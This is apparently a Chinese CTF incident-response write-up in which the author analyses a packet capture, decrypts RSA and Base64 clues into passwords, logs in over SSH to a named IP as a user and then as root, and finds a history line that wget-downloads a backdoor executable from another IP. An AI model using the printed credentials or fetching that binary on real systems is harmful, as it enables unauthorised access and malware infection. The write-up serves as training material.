挑战赛第四关应急响应题目通关秘籍

应急响应 2019-11-10

本文作者:Cherishao(信安之路作者团队成员 & 信安之路应急响应小组组长) 招新文章:原创 信安之路应急响应小组招募志同道合的朋友

题目地址:

http://zuohaoyingjixiangyinghennan.xazlsec.com

首页截图如下:

img

一、获取攻击者的 root

既然前文提到了溯源攻击者,又给了流量包pcapng包,自然是从流量下手;Wireshark 走起。

协议分级,先看看是否请求下载了什么东西,filter:http,发现请求了以下几个文件。

img

看到了有个 Flag 相关的压缩包,先将其导出来,看看里面有啥:

img

一个公钥、一个私钥,这就不难猜出是利用 RSA 加密了,上面的神秘代码,应该就是密文,

在线 RSA 加密/解密工具

http://tools.jb51.net/password/rsa_encode

解密如下:

img

得到了一个eK8}vD3=的文本,上面给了攻击者的 IP,探测发现开启 SSH 服务,尝试登录 root 失败,思考下发现还有个 passwd.jpg 的文件。下载下来看看先;edge 浏览器打开图片发现如下内容:

img

原来是 Base64 的图片加密,图片转换 Base64:

http://imgbase64.duoshitong.com/

还原看看:得到了一个字符串*mGX3Y-d

img

知道 IP,又得到了passwd*mGX3Y-d,nmap 扫描了只开启 22 端口,爆破的话,又限制了 IP 的次数,继续看看通信流:

img

发现存在一个username=C3A37087469, 知道了 IP 又知道了用户尝试 SSH 登录,一不小心就成功了,真是厉害:).

ssh C3A37087469@207.148.27.120 *mGX3Y-d

img

二、找到了那 backdoor

既然进来了,那就找后门呗!先看下当前目录下,有什么吧!

[C3A37087469@vultr ~]$ ls

key.sh

这 KEY 也太容易找到了吧!别激动,少年!看看内容先。

[C3A37087469@vultr ~]$ catkey.sh

#@Cherishao

echo“Good job!!"

:) Congratulations, you have come here.

  However, you need a higher level of permissions!!!

  It is said that higher privilege passwords are more complicated(16bit).

提示需要更高的权限,那自然就是root了,难不成要提权?自然不是,提示 16bit, 一般默认的初始 vps 密码都会是 16bit,前面不是得到了 2 个字符串嘛,拼接起来:eK8}vD3=*mGX3Y-d,刚好 16bit :) 这脑洞有点大呀!

[C3A37087469@vultr ~]$ suroot
Password:
[root@vultr C3A37087469]# 

(1)查日志,看历史命令,定位到文件位置

先大致检索个吧!ps -ef |grep backdoor* 还真有,少年你太天真了,这么傻的直接命名为这个嘛

[root@vultr ~]# ps -ef |grep backdoor.exe

root      5989 5960 008:58 pts/0    00:00:00 grep--color=auto backdoor.exe

[root@vultr ~]#

(2)还是老老实实的看看 history 先吧!wget了其它的exe 去看看吧

wget http://173.82.235.146/xazlER.exe

(3) 对 xazlER.exe 进行分析,点击既然要输入密码

(4)密码在哪儿呢?你问我,我也想知道呀!莫不是要逆向这个 PE 文件,别慌,不会那么难,看看属性吧!这原始文件名,怎么有一种似曾相识的感觉,对的,少年,就是它(之前的登录密码:) )

(5)用它来解密,看看

img

这里得到了最后的

key:KEY{xazlER006HappyMid-AutumnFestival}

总结

本小题,主要考查了应急响应中的流量分析(文件提取、加解密当然这里设置的场景较为简单),以及 Linux 下后门排查的相关小知识,题目的类型:类似 CTF 里面的misc,难度不是特别大,但是还是比较烧脑,有些东西不要只是想,想到了还是要去试,祝大家玩得开心的同时,也能学到东西。


本文由 信安之路 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

楼主残忍的关闭了评论